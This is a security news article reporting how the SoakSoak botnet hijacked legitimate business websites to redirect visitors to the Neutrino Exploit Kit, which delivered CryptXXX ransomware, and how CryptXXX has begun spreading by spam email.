Ransomware attacks are gaining ground as security researchers uncover that legitimate websites of businesses are being hijacked to serve up CryptXXX ransomware to unsuspecting users. Websites of major businesses such as the DIY projects site of Dunlop, a recruitment firm, a Guatemalan tourism site, a Mexican City water supply firm's site and a security firm's site have been hit by the ransomware.
According to Invincea security researcher, Pat Belcher, a botnet called SoakSoak or RealStatistics is likely responsible for powering the CryptXXX campaign. Botnets like these scan websites for vulnerabilities and infect servers to conduct attacks. In this particular wave of attacks, the SoakSoak botnet implanted a malicious code that enabled hijacked websites to redirect users to a website hosting the infamous tradable malware dropping tool, commonly sold via dark web marketplaces – the Neutrino Exploit Kit.
"Once a victim is redirected to the Neutrino Exploit Kit, the endpoint is scanned to check if it is using any security software such as VMWare, Wireshark, ESET, Fiddler or a Flash player debugging utility. If those programs are not present on the victim host the Command Shell is opened and the windows utility of Wscript is accessed to download the ransomware payload from a Command and Control server," said Belcher.
This is not the first time that the SoakSoak botnet has launched such a massive attack. In 2014, security firm Sucuri found that the botnet had compromised over 100,000 Wordpress webistes, which led to Google blacklisting over 11,000 in a single day. However, both the ransomware and the exploit kit have since been updated, to evade security detecting software as well as luring in more victims.
The constant evolution of the CryptXXX ransomware
The ransomware has several variants and its recent active campaigns indicate that cybercriminals are banking on new variants to launch extensive attacks. A recent report by security firm ProoftPoint shows how a strain of the ransomware is now being distributed by spam emails for the first time.
"CryptXXX ransomware has propagated rapidly since appearing earlier this year. The ransomware was initially linked to groups associated with Angler and was distributed almost exclusively via Angler. As Angler activity dried up over this quarter, many actors turned to instances of the Neutrino exploit kit for distribution. Not surprisingly, with the disruption in the EK market, it appears that CryptXXX actors are turning to email as well," ProofPoint said.